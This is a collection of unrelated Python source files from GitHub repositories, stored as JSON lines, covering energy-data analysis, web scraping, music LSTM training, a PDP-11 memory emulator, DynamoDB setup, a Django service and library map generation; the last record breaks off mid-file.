+{"seq_id":"26426440890","text":"# By Dominic Eggerman\n# Imports\nimport getpass\nimport psycopg2\nimport pandas as pd\nimport numpy as np\nimport json\nimport datetime\nimport argparse\nimport scipy.stats as scistats\nimport matplotlib.pyplot as plt\nfrom urllib.error import URLError, HTTPError\nfrom urllib.request import urlopen\nimport readfile\n\n\n# EIA API query to get data from a plant code\ndef EIAPlantData(key, plant_code):\n # Construct URL\n url = \"http://api.eia.gov/series/?api_key={0}&series_id=ELEC.PLANT.CONS_TOT.{1}-NG-ALL.M\".format(key, plant_code)\n\n try:\n # URL request, opener, reader\n response = urlopen(url)\n raw_byte = response.read()\n raw_string = str(raw_byte, \"utf-8-sig\")\n\n # Convert to JSON\n jso = json.loads(raw_string)\n\n # Convert JSON data we want to dataframe\n noms_data = jso[\"series\"][0][\"data\"]\n noms_df = pd.DataFrame(data=noms_data, columns=[\"eia_date\", \"eia_noms\"])\n noms_df = noms_df.iloc[::-1] # Reverse df - oldest to newest\n dates = [datetime.datetime.strptime(\"{0}-{1}-{2}\".format(s[:4], s[4:6], \"01\"), \"%Y-%m-%d\").date() for s in noms_df[\"eia_date\"].values] # Convert string to datetime\n noms_df = noms_df.replace(noms_df[\"eia_date\"].values, dates)\n # Get lat/long and start/end dates\n plant_lat, plant_long = float(jso[\"series\"][0][\"lat\"]), float(jso[\"series\"][0][\"lon\"])\n start_month, end_month = jso[\"series\"][0][\"start\"], jso[\"series\"][0][\"end\"]\n\n # Return all as a dictionary\n return {\"plant_code\":plant_code, \"noms_data\":noms_df, \"lat\":plant_lat, \"long\":plant_long, \"start_date\":start_month, \"end_date\":end_month}\n\n except HTTPError as err:\n print(\"HTTP error...\")\n print(\"Error code:\", err.code)\n\n except URLError as err:\n print(\"URL type error...\")\n print(\"Reason:\", err.reason)\n\n except KeyError:\n return None\n\n\n# Connect to insightprod database\ndef connect(usr, pswrd):\n # Establish connection with username and password\n conn = psycopg2.connect(dbname=\"insightprod\", user=usr, password=pswrd, host=\"insightproddb\")\n # print(\"Successfully connected to database...\")\n return conn\n\n\n# Get location IDs and matching plant codes\ndef locationPlantMap(conn):\n # SQL statement\n statement = \"\"\"SELECT lpm.location_id, plt.eia_plant_code FROM ts1.location_plant_map AS lpm\n INNER JOIN ts1.plant AS plt ON lpm.plant_id = plt.id\n ORDER BY location_id\n \"\"\"\n\n try:\n # Read SQL and return\n print(\"Getting plant codes and location IDs...\")\n df = pd.read_sql(statement, conn)\n return df\n except:\n print(\"locationPlantMap(): Error encountered while executing SQL. Exiting...\")\n conn.close()\n return None\n\n\n# Get nominations data for a single location id\ndef getCapacityData(conn, plt_id): # ?? No notice ??\n statement = \"\"\"SELECT date_trunc('month', ctnn.gas_day)::date AS insight_date, SUM((ctnn.scheduled_cap) * r.sign * -1) AS insight_noms\n FROM analysts.captrans_with_no_notice AS ctnn\n INNER JOIN analysts.location_role_v AS lr ON ctnn.location_role_id = lr.id\n INNER JOIN analysts.location_v AS l ON lr.location_id = l.id\n INNER JOIN analysts.role_v AS r ON lr.role_id = r.id\n INNER JOIN ts1.location_plant_map AS lpm ON lpm.location_id = l.id\n INNER JOIN ts1.plant AS plt ON plt.id = lpm.plant_id\n WHERE ctnn.gas_day BETWEEN '2014-01-01' AND '2018-05-31'\n AND plt.eia_plant_code = {0}\n GROUP BY 1\n \"\"\".format(plt_id)\n \n try:\n # Read SQL and return\n df = pd.read_sql(statement, conn)\n return df\n except:\n print(\"getCapacityData(): Error encountered while executing SQL. Exiting...\")\n conn.close()\n return None\n\n\n# Get plants that have already been analyze\ndef analyzedPlants():\n analyzed_plts = []\n with open(\"attribution_issues.txt\", mode=\"r\") as file1:\n for line in file1:\n try:\n plt = line.rstrip().split(\"|\")[1].split(\":\")[1].strip()\n analyzed_plts.append(int(plt))\n except IndexError:\n pass\n with open(\"confirmed_attributions.txt\", mode=\"r\") as file2:\n for line in file2:\n try:\n plt = line.rstrip().split(\"|\")[1].split(\":\")[1].strip()\n analyzed_plts.append(int(plt))\n except IndexError:\n pass\n with open(\"database_issues.txt\", mode=\"r\") as file3:\n for line in file3:\n try:\n plt = line.rstrip().split(\"|\")[1].split(\":\")[1].strip()\n analyzed_plts.append(int(plt))\n except IndexError:\n pass\n return analyzed_plts\n\n\n# Merge EIA and insight dataframes\ndef mergeDf(eia, insight):\n # Merge dataframes\n merged_df = eia[\"noms_data\"].join(insight.set_index(\"insight_date\"), on=\"eia_date\")\n # Take only rows with non-NaN values\n merged_df = merged_df[pd.notnull(merged_df['insight_noms'])]\n # Check length of array\n if len(merged_df[\"insight_noms\"].values) <= 5: # What number should go here??\n pass\n # Logic for handling in loop\n\n return merged_df\n\n\n# Sum nominations in dataframe for same dates\ndef truncateDates(df):\n # Start a count log (for purposes of having 2, 3, or 4 loc_ids)\n num_locs = 1\n # Loop through dates\n for ind in range(len(df[\"eia_date\"].values)):\n try:\n if df[\"eia_date\"].values[ind] == df[\"eia_date\"].values[ind+1]:\n num_locs += 1\n else:\n break\n except:\n pass\n # Filter dates and EIA noms\n dates = df[\"eia_date\"].values[::num_locs]\n eia_noms = df[\"eia_noms\"].values[::num_locs]\n # Sum inisght noms\n insight_noms = [sum(df[\"insight_noms\"].values[i:i+num_locs]) for i in range(0, len(df[\"insight_noms\"].values), num_locs)]\n\n return pd.DataFrame({\"eia_date\":dates, \"eia_noms\":eia_noms, \"insight_noms\":insight_noms})\n \n\n\n# Score the r2 of a merged dataframe\ndef scoreR2(df):\n try:\n # Score the R squared\n r = scistats.linregress(df[\"eia_noms\"].values, df[\"insight_noms\"].values).rvalue\n r2 = r * r # Get R2\n return r2\n except ValueError:\n return None\n\n\n# Plot EIA data versus insight data\ndef plotNominations(df, loc, plt_code, r2):\n # Plot\n ax = plt.axes()\n ax.plot(merged_df[\"eia_date\"].values, merged_df[\"eia_noms\"].values)\n ax.plot(merged_df[\"eia_date\"].values, merged_df[\"insight_noms\"].values)\n # Title / axis labels / legend / r2 value\n plt.title(\"Location ID: {0} Plant code: {1}\".format(loc, plt_code))\n plt.ylabel(\"Mcf/d\")\n plt.xticks(rotation=90)\n legend = plt.legend([\"EIA data\", \"Insight data\"], frameon=False)\n legend.draggable()\n plt.text(0.9, 1.05, \"$R^2$ = {:.4f}\".format(r2), ha=\"center\", va=\"center\", transform=ax.transAxes)\n # Fix layout and show\n plt.tight_layout()\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n # Argparse and add arguments\n parser = argparse.ArgumentParser(description=\"Below is a list of optional arguements with descriptions. Please refer to README.md for full documentation...\")\n parser.add_argument(\"-g\", \"--graph\", help=\"Do not display graph.\", action=\"store_false\")\n parser.add_argument(\"-m\", \"--master\", help=\"Use masterCapData.csv to get insight noms (faster).\", action=\"store_false\") #Change this name\n options = parser.parse_args()\n\n # Get login creds for insightprod and EIA API\n creds = readfile.readFile(\"creds.txt\")\n username, password, eia_key = creds[0], creds[1], creds[2]\n \n # Refactor all this ??\n # Use master file to compare insight data to EIA\n if options.master:\n # Read master data file\n master_df = pd.read_csv(\"masterCapData.csv\")\n\n # List of previously analyzed plants\n analyzed_plants = analyzedPlants()\n\n # Iterate through unique EIA plant codes\n for ind, plant in enumerate(list(set(master_df[\"plant_code\"].values))):\n print(\"Analyzing plant: {0} | {1}/{2}\".format(plant, ind, len(list(set(master_df[\"plant_code\"].values)))))\n\n # Skip if plant has been analyzed\n if plant in analyzed_plants:\n print(\"Plant already analyzed. Skipping.\")\n continue\n\n # Filter the data for a single plant\n cap_data = master_df.loc[master_df[\"plant_code\"] == plant]\n # Get location ID / ID's\n location_id = list(set(cap_data[\"location_id\"].values))\n # Drop unnecessary columns and convert dates from str to datetime\n cap_data = cap_data.drop(columns=[\"location_id\", \"plant_code\"])\n dates = [datetime.datetime.strptime(\"{0}-{1}-{2}\".format(d[:4], d[5:7], d[8:10]), \"%Y-%m-%d\").date() for d in cap_data[\"insight_date\"].values]\n cap_data = cap_data.replace(cap_data[\"insight_date\"].values, dates)\n\n # Obtain EIA data\n eia_data = EIAPlantData(eia_key, plant)\n if eia_data is None:\n print(\"EIA data error.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, datetime.datetime.now().date()))\n continue\n\n # Merge the dataframes\n merged_df = truncateDates(mergeDf(eia_data, cap_data))\n\n # Score the r2\n r2 = scoreR2(merged_df)\n if r2 is None:\n print(\"No overlapping values on which to grade r2.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, datetime.datetime.now().date()))\n continue\n\n # Plot the results\n if options.graph:\n plotNominations(merged_df, location_id, plant, r2)\n\n # Confirm / reject attribution\n if r2 >= 0.50:\n print(\"Attribution confirmed (r2 > 50)\")\n with open(\"confirmed_attributions.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, r2, datetime.datetime.now().date()))\n elif r2 < 0.50:\n print(\"Attribution issue (r2 < 50)\")\n with open(\"attribution_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, r2, datetime.datetime.now().date()))\n else:\n print(\"Point not confirmed or unconfirmed...\")\n\n\n # Run a query each time\n else:\n # Connect, get location IDs and matching plant codes\n connection = connect(username, password)\n try:\n plant_locs = locationPlantMap(connection)\n print(\"Found {0} attributed plants in insightprod\".format(len(plant_locs[\"location_id\"].values)))\n except:\n connection.close()\n print(\"Error encountered while querying for plant locations and codes.\")\n\n # Update with new ??\n # # Remove plants from list that have already been analyzed\n # analyzed_locs = analyzedPlants()\n # for loc in analyzed_locs:\n # plant_locs = plant_locs[plant_locs.location_id != loc]\n \n print(\"{0} plants have not been analyzed\".format(len(plant_locs[\"location_id\"].values)))\n\n # Close connection\n connection.close()\n\n # Iterate through the \"confirmed\" plants\n for ind, (location_id, plant_code) in enumerate(zip(plant_locs[\"location_id\"].values, plant_locs[\"eia_plant_code\"].values)):\n # Open connection\n connection = connect(username, password)\n\n print(\"| Analyzing Plant {0} / {1} |\".format(ind+1, len(plant_locs[\"location_id\"].values)))\n try:\n # Obtain EIA and insight data\n eia_data = EIAPlantData(eia_key, plant_code)\n cap_data = getCapacityData(connection, plant_code)\n except:\n connection.close()\n print(\"Error accessing EIA / insight nominations data.\")\n\n # Error Check\n if cap_data is None:\n print(\"No capacity data returned.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(location_id, plant_code, datetime.datetime.now().date()))\n continue\n\n # Merge the dataframes\n merged_df = mergeDf(eia_data, cap_data)\n\n # Score the r2\n r2 = scoreR2(merged_df)\n if r2 is None:\n print(\"No overlapping values on which to grade r2.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(location_id, plant_code, datetime.datetime.now().date()))\n continue\n\n # Plot the results\n if options.graph:\n plotNominations(merged_df, location_id, plant_code, r2)\n\n # Confirm / reject attribution\n if r2 >= 0.50:\n print(\"Attribution confirmed (r2 > 50)\")\n with open(\"confirmed_attributions.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(location_id, plant_code, r2, datetime.datetime.now().date()))\n elif r2 < 0.50:\n print(\"Attribution issue (r2 < 50)\")\n with open(\"attribution_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(location_id, plant_code, r2, datetime.datetime.now().date()))\n else:\n print(\"Point not confirmed or unconfirmed...\")\n \n # Close connection\n connection.close()","repo_name":"dominiceggerman/EIAPlantAttribution","sub_path":"attributePlant.py","file_name":"attributePlant.py","file_ext":"py","file_size_in_byte":14437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30735280127","text":"# Import necessary libraries\nimport csv\nimport re\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom bs4 import BeautifulSoup\n\n# Initialize the browser with headless option\nchrome_options = Options()\nchrome_options.add_argument('--headless')\ndriver = webdriver.Chrome(options=chrome_options)\n\n# Set the URL to scrape\nurl = 'https://galamart.ru/catalog/hoztovary/'\ndriver.get(url)\n\n# Set implicit wait to give the page time to load\ndriver.implicitly_wait(10)\n\n# Initialize explicit wait for the \"More\" button\nwait = WebDriverWait(driver, 10)\n\n# Set URL pattern for the pages to scrape\nurl_page = 'https://galamart.ru/catalog/hoztovary/page-'\n\n# Loop through each page and scrape the data\nfor page_number in range(2, 31):\n # Build the full URL for each page\n url_full = url_page + str(page_number) + '/'\n driver.get(url_full)\n\n # Wait for the page to load\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'div.col.main-content')))\n\n # Get the HTML code after all the cards have loaded\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n\n # Find the card block\n product_list = soup.find('div', {'class': 'col main-content'})\n\n # Loop through each card and extract the title and price\n notebooks = []\n for product in product_list.find_all('div', {'class': 'catalog-card'}):\n title = product.find('span', {'itemprop': 'name'}).text.strip()\n price = product.find('div', {'class': 'product-price'}).text.strip()\n price_digits = int(re.sub('\\D', '', price))\n notebooks.append({'title': title, 'price': price_digits})\n\n # Sort the list of notebooks by price in descending order\n notebooks_sorted = sorted(notebooks, key=lambda x: x['price'], reverse=True)\n\n # Write the notebook information to a CSV file\n with open('galamart.csv', 'a', encoding='utf-8', newline='') as csvfile:\n fieldnames = ['title', 'price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for notebook in notebooks_sorted:\n writer.writerow(notebook)\n\n# Close the browser\ndriver.quit()\n","repo_name":"AlexBalind70/Parcing-Example","sub_path":"WEB-Parcing/Library BeautifulSoup and Selenium Example №2.py","file_name":"Library BeautifulSoup and Selenium Example №2.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26238990858","text":"import glob\nimport keras\nimport numpy\nimport pickle\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.layers import Activation\nfrom keras.layers import BatchNormalization as BatchNorm\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential\nfrom music21 import *\n\nnotes = []\nfor file in glob.glob(\"midi_songs/*.mid\"):\n try:\n midi = converter.parse(file)\n notes_to_parse = None\n parts = instrument.partitionByInstrument(midi)\n if parts: # file has instrument parts\n notes_to_parse = parts.parts[0].recurse()\n else: # file has notes in a flat structure\n notes_to_parse = midi.flat.notes\n for element in notes_to_parse:\n if isinstance(element, note.Note):\n notes.append(str(element.pitch))\n elif isinstance(element, chord.Chord):\n notes.append('.'.join(str(n) for n in element.normalOrder))\n except:\n print(file+\" failed\")\n\n with open('data/notes', 'wb') as filepath:\n pickle.dump(notes, filepath)\n\nn_vocab = len(set(notes))\nsequence_length = 100\n# get all pitch names\npitchnames = sorted(set(item for item in notes))\n# create a dictionary to map pitches to integers\nnote_to_int = dict((note, number) for number, note in enumerate(pitchnames))\nnetwork_input = []\nnetwork_output = []\n# create input sequences and the corresponding outputs\nfor i in range(0, len(notes) - sequence_length, 1):\n sequence_in = notes[i:i + sequence_length]\n sequence_out = notes[i + sequence_length]\n network_input.append([note_to_int[char] for char in sequence_in])\n network_output.append(note_to_int[sequence_out])\nn_patterns = len(network_input)\n# reshape the input into a format compatible with LSTM layers\nnetwork_input = numpy.reshape(network_input, (n_patterns, sequence_length, 1))\n# normalize input\nnetwork_input = network_input / float(n_vocab)\nnetwork_output = np_utils.to_categorical(network_output)\n\n#Training\nmodel = Sequential()\nmodel.add(LSTM(\n 256,\n input_shape=(network_input.shape[1], network_input.shape[2]),\n return_sequences=True\n ))\nmodel.add(Dropout(0.3))\nmodel.add(LSTM(512, return_sequences=True))\nmodel.add(Dropout(0.3))\nmodel.add(LSTM(256))\nmodel.add(Dense(256))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(n_vocab))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n\n#Save output at the end of each epoch -> terminate once satisfied with loss value\nfilepath = \"weights-improvement-{epoch:02d}-{loss:.4f}-bigger.hdf5\" \ncheckpoint = ModelCheckpoint(\n filepath, monitor='loss', \n verbose=0, \n save_best_only=True, \n mode='min'\n) \ncallbacks_list = [checkpoint] \nmodel.fit(network_input, network_output, epochs=200, batch_size=64, callbacks=callbacks_list)","repo_name":"gopuman/MusicGen","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17417921345","text":"# -*- coding: utf-8 -*-\n\nimport random\n\nclass Memory() :\n def __init__(self) :\n self.memory = None\n self.mode = \"word\"\n\n self.resetByZero()\n\n def setMode(self, mode) :\n assert mode == 'byte' or mode == 'word', 'mode must be \"byte\" or \"word\"'\n self.mode = mode\n\n def __setitem__(self, index, value) :\n if isinstance(index, slice) :\n if isinstance(index.stop, str) :\n mode = self.mode\n self.setMode(index.stop)\n self[index.start] = value\n self.setMode(mode)\n else :\n self.memory.__setitem__(index, value)\n else :\n if self.mode == 'byte' :\n self.memory[index&0xffff] = value&0xff\n elif self.mode == 'word' :\n self.memory[index&0xffff] = value&0xff\n self.memory[(index+1)&0xffff] = (value>>8)&0xff\n else :\n raise AssertionError('mode must be \"byte\" or \"word\"')\n\n def __getitem__(self, index) :\n if isinstance(index, slice) :\n if isinstance(index.stop, str) :\n mode = self.mode\n self.setMode(index.stop)\n value = self[index.start]\n self.setMode(mode)\n return value\n else :\n return self.memory.__getitem__(index)\n else :\n if self.mode == 'byte' :\n return self.memory[index&0xffff]\n elif self.mode == 'word' :\n return (self.memory[(index+1)&0xffff]<<8)+self.memory[index&0xffff]\n else :\n raise AssertionError('mode must be \"byte\" or \"word\"')\n\n def load(self, data, point=0) :\n self.memory[point:point+len(data)] = data\n\n def resetByRandom(self) :\n self.memory = [ random.randint(0, 255) for x in range(65536) ]\n\n def resetByZero(self) :\n self.memory = [ 0 for x in range(65536) ]\n\n","repo_name":"miettal/pypdp11simulator","sub_path":"pdp11_memory.py","file_name":"pdp11_memory.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15408488726","text":"import logging\n\nimport boto3\nfrom api.utils.env_utils import get_env\n\nenv = get_env()\n\nlogging.debug('ENV = ' + env)\n\ntables_created = False\n\n\ndef create_tables(d):\n logging.debug('creating tables')\n\n logging.debug('creating user table')\n # user\n d.create_table(\n TableName='netify_user',\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH' # Partition key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'email',\n 'AttributeType': 'S'\n }\n\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n },\n GlobalSecondaryIndexes=[\n {\n 'IndexName': 'email-index',\n 'KeySchema': [\n {\n 'AttributeName': 'email',\n 'KeyType': 'HASH' # Partition key\n }\n ],\n 'Projection': {\n 'ProjectionType': 'ALL'\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n }\n ]\n )\n\n logging.debug('creating message table')\n # message\n d.create_table(\n TableName='netify_message',\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH' # Partition key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n )\n\n\n\n\nif env == 'PROD':\n dynamo_db = boto3.resource('dynamodb')\nelse:\n dynamo_db = boto3.resource('dynamodb', endpoint_url='http://localhost:8000')\n if not tables_created:\n try:\n create_tables(dynamo_db)\n tables_created = True\n logging.debug(\"****All tables created\")\n except Exception as e:\n logging.debug('bleep encountered')\n logging.debug(e)\n\n\n\n\n","repo_name":"fir-min/netify","sub_path":"back_end/netify/api/data_access/dynamo_db.py","file_name":"dynamo_db.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73612201841","text":"from django.apps import apps\nfrom django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404\n\nfrom ec_base.common.constant import message\nfrom ec_base.common.constant.app_label import ModelAppLabel\nfrom ec_base.common.constant.db_table import DBTable\nfrom ec_base.common.constant.service import Master\nfrom ec_base.common.utils.exceptions import APIErr\nfrom ec_base.master.serializers.base_master import BaseMasterListSlz, BaseMasterRetrieveSlz, BaseMasterCreateSlz\nfrom ec_base.master.serializers.discount_rate import MasterDiscountRateSlz\nfrom ec_base.master.serializers.district import MasterDistrictSlz\n\n\nclass MasterBaseService:\n def __init__(self, master_name):\n self.master_name = master_name\n self.table_name, self.model_name, self.allowed_to_create = Master.unpack(master_name)\n self.app_label = ModelAppLabel.MASTER\n self.model = apps.get_model(self.app_label, self.model_name)\n\n def get_item_by_id(self, pk):\n return get_object_or_404(self.model, pk=pk)\n\n def list(self, parent_id=None):\n queryset = self.model.objects.all().filter()\n if self.master_name == DBTable.MASTER_DISTRICT and parent_id is not None:\n return queryset.filter(city_id=parent_id)\n\n return queryset\n\n def create(self, data):\n try:\n serializer_class = self.get_master_create_serializer()\n serializer = serializer_class(data=data)\n serializer.is_valid(raise_exception=True)\n instances = self.model.objects.filter(**serializer.validated_data)\n if len(instances) > 0:\n instance = instances.first()\n instance.is_deleted = False\n instance.save()\n else:\n instance = self.model.objects.create(**serializer.validated_data)\n\n serializer = BaseMasterRetrieveSlz(instance)\n return serializer\n except IntegrityError:\n raise APIErr(message.DUPLICATE_ENTRY)\n\n def delete(self, pk):\n instance = self.get_item_by_id(pk)\n instance.is_deleted = True\n instance.save()\n\n def get_master_list_serializer(self, *args, **kwargs):\n slz_switcher = {\n DBTable.MASTER_DISTRICT: MasterDistrictSlz,\n DBTable.MASTER_DISCOUNT_RATE: MasterDiscountRateSlz,\n }\n slz = slz_switcher.get(self.master_name, BaseMasterListSlz)\n return slz(*args, **kwargs)\n\n def get_master_create_serializer(self):\n if not self.allowed_to_create:\n raise APIErr(message.NOT_ALLOWED_TO_CREATE)\n\n return BaseMasterCreateSlz\n","repo_name":"tranhdq97/E-commerce","sub_path":"backend/ec_base/master/services/base_master.py","file_name":"base_master.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"40606781203","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport csv\nfrom datetime import datetime\nfrom collections import defaultdict\n\nclass ParsePostnummer(object):\n def __init__(self,infile='../data/Postnummerregister_utf8.txt'):\n \"\"\"\n Format: postnummer\\tpoststed\\tkommunekode\\tkommunenavn\\tkategori\n \"\"\"\n self.infile=infile\n self.pnlist=self.parsefile()\n self.pn_to_navn=self._pn_to_navn()\n self.pn_to_kkode=self._pn_to_kkode()\n\n def parsefile(self):\n with open(self.infile) as ff:\n pnlist=[]\n for line in ff:\n ss=line.split('\\t')\n ss=[s.strip() for s in ss]\n ss[0]=int(ss[0])\n ss[2]=int(ss[2])\n pnlist.append(ss)\n return pnlist\n\n def _pn_to_navn(self):\n return {s[0]:s[3] for s in self.pnlist}\n\n def _pn_to_kkode(self):\n return {s[0]:s[2] for s in self.pnlist}\n\nclass ParseAvisKategori(object):\n def __init__(self,infile='../data/avis_kategori.csv'):\n \"\"\"\n Format: postnummer\\tpoststed\\tkommunekode\\tkommunenavn\\tkategori\n \"\"\"\n self.infile=infile\n self.avis=self.parsefile()\n #print(self.aviser)\n\n\n def parsefile(self):\n with open(self.infile,newline='\\n') as ff:\n self.aviser=[]\n self.avisDict={}\n self.veiklasser=defaultdict(set)\n csvread = csv.reader(ff, delimiter='\\t')\n for iii,row in enumerate(csvread):\n row=[r.lower() for r in row]\n if iii==0:\n self.heads=row\n continue\n row[2]=int(row[2])\n\n if row[5]!='#n/a':\n row[5]=datetime.strptime(row[5],'%m/%d/%Y')\n self.veiklasser[row[2]].add(row[1])\n self.aviser.append(row)\n self.avisDict[row[1]]=row\n\n def avisVeiklasse(self,avis):\n try:\n return self.avisDict[avis.lower()][2]\n except KeyError as e:\n return -1\n\n def veiKlasseAvis(self,veiklasse,avis):\n return avis.lower() in self.veiklasser[veiklasse]\n\n\n\nif __name__ == \"__main__\":\n parseAvis=ParseAvisKategori()\n","repo_name":"Froskekongen/salestrack-processcustomer","sub_path":"src/parse_postnummer.py","file_name":"parse_postnummer.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70042903922","text":"\n# 以图书馆地图上南下北,leaflet 以左上角为原点\nfrom enum import Enum\nimport json\n\n# console.log(map.unproject([-w, -h], map.getMaxZoom()-1))\n\nmapImgWidth = 1789\nmapImgHeight = 1971\n\nlatLangX = 223.625\nlatLangY = -246.375\n\nfeatures = {\n \"type\": \"FeatureCollection\",\n \"features\": [\n ]\n}\n\n# 设定每个书架长2,宽0.5 ,过道宽1 (实际上书架为自由拼凑有长有短,\nshelfLength = 8\nshelfWidth = 2\naisleWidth = 1\n\n\nclass Towards(Enum):\n NorthSouth = True\n WestEast = False\n\n# towards : 书架朝向, True 南北 , False 西东\n\n\ndef getCoodinate(towards, x, y):\n coordinates = []\n if towards == Towards.NorthSouth:\n # left top, lb, rb, rt Polygons and MultiPolygons should follow the right-hand rule\n coordinates = [\n [x - shelfWidth/2, y + shelfLength/2],\n [x - shelfWidth/2, y - shelfLength/2],\n [x + shelfWidth/2, y - shelfLength/2],\n [x + shelfWidth/2, y + shelfLength/2],\n # the first and last positions in a LinearRing of coordinates must be the same\n [x - shelfWidth/2, y + shelfLength/2],\n ]\n else:\n coordinates = [\n [x - shelfLength/2, y + shelfWidth/2],\n [x - shelfLength/2, y - shelfWidth/2],\n [x + shelfLength/2, y - shelfWidth/2],\n [x + shelfLength/2, y + shelfWidth/2],\n [x - shelfLength/2, y + shelfWidth/2],\n ]\n return [coordinates]\n\n\ndef getFeature(northWestName, southEastName, towards, x, y):\n return {\n \"type\": \"Feature\",\n \"properties\": {\n \"northWestName\": \"{}\".format(northWestName),\n \"southEastName\": \"{}\".format(southEastName),\n },\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": getCoodinate(towards, x, y)\n }\n }\n\n\ndef getShelfOffsetX(offsetX, index):\n return offsetX + index * (shelfWidth + aisleWidth)\n\ndef zipNumbering(lList):\n index = 0\n zipped = []\n length = len(lList)\n if not length % 2 == 0:\n raise '书架编号长度非偶数'\n while(index < length-1):\n zipped.append([lList[index],lList[index+1]])\n index += 2\n return zipped \n\ndef get_202_science_chinese():\n offsetX_202_science_chinese = latLangX * 0.115\n offsetY_202_science_chinese = latLangY * 0.75\n\n # 202 理科借阅\n # 24个书架\n\n # 每两个字符串左右代表一个书架的西东两面\n # todo 修正,东西面放入property\n row1ShelfNumbering = [\"x703.1\", \" x21\", \" u\", \" tu983\", \" tu201.4\", \" ts972.122\", \" ts664.01-39\", \" tq150.1\", \" tn941.3\", \" tn919\", \" tn911.22\", \" tn643\", \" tn01\", \" tm13\", \" th-62\", \" tb472-39\", \" tb11\", \" s682.2\", \" s216.4\", \" r746.940.5\", \" r541.5\", \" r323.1\",\n \" r212\", \" r151.3-62\", \" q959.1\", \" q945.4\", \" q78\", \" q2-49\", \" q-49\", \" p7-092\", \" p338\", \" p159-49\", \" o64-61\", \" o6-3\", \" o413.1\", \" o351.2\", \" o226\", \" o21\", \" o174.1\", \" o157\", \" o141.4\", \" o13\", \" o13\", \" o1-53\", \" o1\", \" n49\", \" n091-49\", \" n\", ]\n zipped = zipNumbering(row1ShelfNumbering)\n\n for index in range(len(zipped)):\n features['features'].append(\n getFeature(\n zipped[index][0],\n zipped[index][1],\n Towards.NorthSouth,\n getShelfOffsetX(offsetX_202_science_chinese, index),\n offsetY_202_science_chinese\n )\n )\n # todo\n row2 = []\n\n\nget_202_science_chinese()\n\nwith open('./data.js', 'w') as f:\n f.write(\"var features = {}\".format(json.dumps(features)))\n","repo_name":"lraty-li/scnu-library-map","sub_path":"genGeoJson.py","file_name":"genGeoJson.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71533126322","text":"from pydantic import BaseModel\nfrom typing import Any, Dict, AnyStr, List, Union, Optional\n\nJSONObject = Dict[AnyStr, Any]\nJSONArray = List[Any]\nJSONStructure = Union[JSONArray, JSONObject]\n\n\nclass VectorizedText(BaseModel):\n sentence_vector: List[float]\n status: 